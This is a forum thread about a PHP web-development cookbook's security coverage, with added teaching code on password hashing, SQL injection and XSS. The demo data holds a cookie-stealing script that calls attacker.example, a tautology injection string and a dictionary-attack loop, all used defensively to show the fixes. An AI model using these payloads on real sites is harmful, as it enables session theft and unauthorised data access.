
Web Developer's Cookbook - Questions

Raghavan Muthu
Hello Robin Nixon,

Congratulations on your new book. It seems to be a catchy one as it deals with scenarios and solutions rather than concepts being explained theoretically.

I have a few questions.

1. Have you covered the security aspects of a PHP based web application?
2. How about SQL Injection, XSS, etc.?
3. Is it only based on HTML5 or prior versions also being covered?
4. Does it address the batch upload of MySQL in PHP?
5. Does it explain the file attachment aspect of PHP?

These are the areas developers mostly feel are left untouched in books, and so they google around for solutions.

Congratulations once again and thanks for attending the Book Promo

I am sure you would have a nice time ranching

Cheers,
Raghavan alias Saravanan M
Robin Nixon
Author
Hi Raghavan,

In answer to your questions:

1. Yes, security is incorporated wherever necessary. For example, salting is used to obfuscate any passwords saved in MySQL (which are then stored as unencryptable MD5s).
2. Two recipes provided are SanitizeString() and MySQLSanitizeString(), which will prevent SQL injection/XSS. Recipes in both JavaScript and PHP are also provided to thoroughly process any user input, and which can strip out anything malicious.
3. There is not much HTML5 in these recipes, since most of the tasks are easily accomplished in standard HTML.
4. A PHP recipe is provided to handle file uploads to a web server.

- Robin.
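The post above mentions storing passwords as salted MD5 hashes. The book's own recipe is not reproduced on this page, so the following is an added example written for this thread, not Robin's code: a salted-MD5 scheme in the shape described (the salt format, 8 random bytes as hex stored next to the hash, is my assumption) placed beside PHP's built-in password_hash()/password_verify(), plus a small dictionary run that shows what a salt does and does not buy you. The salt stops precomputed (rainbow) tables from being reused across users; it does nothing about the speed of MD5 itself, so a weak password still falls to a straight dictionary attack on the stolen row, whereas password_hash() uses a deliberately slow algorithm (bcrypt by default) and encodes salt, cost and algorithm id in the string it returns.

```php
<?php
// Added example, not from the book. Requires PHP 7.1+ (random_bytes, password_hash).

// Scheme A: what the post describes. Salt and MD5(salt . password) are both kept
// in the user row. The salt layout here is an assumption for illustration.
function storeSaltedMd5(string $password): array {
    $salt = bin2hex(random_bytes(8));                  // 16 hex chars, unique per user
    return ['salt' => $salt, 'hash' => md5($salt . $password)];
}

function checkSaltedMd5(string $password, array $row): bool {
    // hash_equals() avoids leaking the match position through timing.
    return hash_equals($row['hash'], md5($row['salt'] . $password));
}

// Scheme B: the PHP standard library's password API. No salt handling needed;
// the returned string carries algorithm id, cost factor and salt.
function storeModern(string $password): string {
    return password_hash($password, PASSWORD_DEFAULT);
}

function checkModern(string $password, string $stored): bool {
    return password_verify($password, $stored);
}

// Offline guessing against a stolen salted-MD5 row. The salt forces the attacker
// to hash each guess per user, but one MD5 costs well under a microsecond.
function dictionaryAttack(array $row, array $wordlist): ?string {
    foreach ($wordlist as $guess) {
        if (checkSaltedMd5($guess, $row)) {
            return $guess;
        }
    }
    return null;
}

// Constructed demo data: a short wordlist and a user who chose a word from it.
$wordlist = ['123456', 'password', 'letmein', 'qwerty', 'dragon', 'summer2011'];
$weakPassword = 'summer2011';

$row = storeSaltedMd5($weakPassword);
$start = microtime(true);
$found = dictionaryAttack($row, $wordlist);
printf("salted MD5 row: dictionary attack recovered %s in %.6f s\n",
       $found === null ? 'nothing' : "'$found'", microtime(true) - $start);

$stored = storeModern($weakPassword);
$start = microtime(true);
$ok = checkModern($weakPassword, $stored);
printf("password_hash: a single verify took %.4f s (%s)\n",
       microtime(true) - $start, $ok ? 'match' : 'no match');
printf("password_hash: wrong password rejected: %s\n",
       checkModern('letmein', $stored) ? 'no' : 'yes');
```

Run it with the PHP CLI. Compare the two timings: the dictionary run over the MD5 row finishes in microseconds, while one bcrypt verification takes on the order of tens of milliseconds, and that per-guess cost is exactly what protects users who picked weak passwords once the table leaks. Storing the password_hash() string in a VARCHAR(255) column is enough; password_needs_rehash() lets you raise the cost later without a migration.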
Raghavan Muthu
That's a good thing, Robin. Thank you.

As per your reply to the welcome thread, MySQLSanitizeString() is of your own codework/toolkit. Is it?
Aamir Sayid
Robin Nixon wrote:Hi Aamir,

You need a basic understanding of each of the technologies. But only enough to understand basic syntax, how to incorporate the external functions or classes and how to call them.

As long as you can create a PHP file, for example, and include the WDC.php recipe file, you can then simply call the recipes you need.

- Robin.


Thank you for the answer, Robin!!! I seriously appreciate the effort you put into writing such a useful book.

PS - The question and the answer were in the Welcome thread.
Robin Nixon
Author
Raghavan Muthu wrote:Thats a good thing Robin. Thank you

As per your reply to the welcome thread, MySQLSanitizeString() is of your own codework/toolkit. Is it?


Yes, it strings together built-in PHP functions (and deals with magic quotes if they are being used) to result in a single function for sanitizing with MySQL.
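Robin's two replies above describe SanitizeString() and MySQLSanitizeString() as helpers that chain built-in PHP functions to make user input safe for MySQL and for display. The book's functions are not on this page, so what follows is an added example written for this thread, not the book's code. It separates the two problems those helpers are asked to solve and shows the idiomatic fix for each: a parameterised query for SQL (the value never becomes part of the statement's syntax), and context-aware escaping with htmlspecialchars() at the moment the value is rendered into HTML. An escaping-based "sanitise for MySQL" variant built on PDO::quote() is shown alongside for comparison. The table, the two users and the injection payload are constructed for the demo; an in-memory SQLite database is used so the script runs offline, and with MySQL only the DSN would change. Magic quotes, which the post mentions handling, were removed in PHP 5.4, so modern code has nothing to undo there.

```php
<?php
// Added example, not the book's SanitizeString()/MySQLSanitizeString().
// Requires PHP 7.1+ with the pdo_sqlite extension (bundled by default).

function connectDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, bio TEXT)');
    // Constructed rows: one harmless bio, one carrying a stored-XSS payload.
    $ins = $pdo->prepare('INSERT INTO users (name, bio) VALUES (?, ?)');
    $ins->execute(['alice', 'Likes <b>bold</b> text & long walks']);
    $ins->execute(['bob', '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>']);
    return $pdo;
}

// Vulnerable: user input concatenated straight into the SQL string.
function findUserUnsafe(PDO $pdo, string $name): array {
    $sql = "SELECT name FROM users WHERE name = '" . $name . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Escaping approach, the category a "sanitise for MySQL" helper falls into.
// Safe only if every value is passed through the driver's own quoter
// (PDO::quote or mysqli_real_escape_string), which knows the connection charset.
function findUserQuoted(PDO $pdo, string $name): array {
    $sql = 'SELECT name FROM users WHERE name = ' . $pdo->quote($name);
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Preferred: parameterised query. The statement is compiled without the value,
// so no amount of quoting in the input can change its structure.
function findUserSafe(PDO $pdo, string $name): array {
    $st = $pdo->prepare('SELECT name FROM users WHERE name = ?');
    $st->execute([$name]);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// XSS is an output-encoding problem, not an input problem: store the raw text,
// escape for the context you are writing into (here, HTML element content).
function renderBio(string $bio): string {
    return '<p>' . htmlspecialchars($bio, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

$pdo = connectDb();
$payload = "' OR '1'='1";   // classic tautology; turns the WHERE clause into "always true"

printf("unsafe  (%s): %s\n", $payload, implode(',', findUserUnsafe($pdo, $payload)));
printf("quoted  (%s): %s\n", $payload, implode(',', findUserQuoted($pdo, $payload)));
printf("safe    (%s): %s\n", $payload, implode(',', findUserSafe($pdo, $payload)));
printf("safe    (alice): %s\n", implode(',', findUserSafe($pdo, 'alice')));

$st = $pdo->prepare('SELECT bio FROM users WHERE name = ?');
$st->execute(['bob']);
echo renderBio($st->fetchColumn()), "\n";
```

The unsafe query returns every row for the tautology payload because the injected quote closes the string literal and the rest becomes SQL; the quoted and prepared versions return nothing, since the whole payload stays a literal value. The last line shows bob's `<script>` arriving in the page as `&lt;script&gt;`, which the browser renders as text rather than executing. Keep the two concerns apart in practice: escaping for HTML before storing would corrupt data that is later sent to a JSON API or an e-mail, and escaping for SQL does nothing for HTML.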